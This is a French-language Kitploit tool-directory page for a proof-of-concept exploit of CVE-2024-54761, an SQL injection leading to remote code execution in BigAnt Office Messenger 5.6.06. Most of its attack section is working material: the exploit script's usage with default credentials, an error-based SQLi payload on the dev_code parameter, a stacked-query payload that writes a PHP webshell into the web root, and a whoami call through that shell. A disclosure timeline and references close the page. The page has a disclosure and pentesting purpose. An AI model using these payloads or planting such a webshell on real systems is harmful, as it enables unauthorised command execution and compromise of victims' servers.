Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-54761 — Preuve de concept de la CVE-2024-54761 | Kitploit
Outils/GitHubGitHub/nscan9/cve-2024-54761
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubnscan9/cve-2024-54761

CVE-2024-54761

Preuve de concept de la CVE-2024-54761

Voir le dépôt
1il y a 11 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

BigAnt Office Messenger 5.6.06 RCE par injection SQL

La vulnérabilité d'injection SQL dans BigAnt Messenger entraîne une vulnérabilité RCE. Suivez les étapes pour l'exploiter.

Utilisation :

root@kitploit:~
CVE-2024-54761.py [-h] -r RHOST [-p RPORT] [-u USERNAME] [-P PASSWORD]
options:
  -h, --help            show this help message and exit
  -r, --rhost RHOST     Target IP address
  -p, --rport RPORT     Target port (default 8000)
  -u, --username USERNAME
                        Login username (default admin)
  -P, --password PASSWORD
                        Login password (default 123456)

Exécutez l'exploit avec les identifiants par défaut.

root@kitploit:~
python CVE-2024-54761.py -r 127.0.0.1
exploit

Exploitation manuelle

Extrayez la version de la base de données utilisée avec le paramètre dev_code exposé à l'injection SQL (SQLi).

root@kitploit:~
# Payload
?dev_code=AND EXTARCTVALUE(rand(),concat(CHAR(126),version(),CHAR(126)))--

Version SQLI Téléversez un webshell PHP sur la cible à l'aide de requêtes empilées SQL.

root@kitploit:~
# Payload
?dev_code=;SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE 'C:/Program Files (x86)/BigAntSoft/IM Console/im_webserver/htdocs/shell.php'-- -

Création webshell 1 Preuve d'exécution de commande :

root@kitploit:~
/shell.php?cmd=whoami

whoami Commande dir

Chronologie

31-10-2024 : Vulnérabilités soumises au fournisseur par e-mail

31-10-2024 : E-mail envoyé au fournisseur, aucune réponse

15-11-2024 : E-mail envoyé au fournisseur, aucune réponse

15-11-2024 : CVE demandées

Référence

https://gist.github.com/nscan9/a31982c90ab40a8e00373bf15efbf52a
https://www.bigantsoft.com

Télécharger l’outil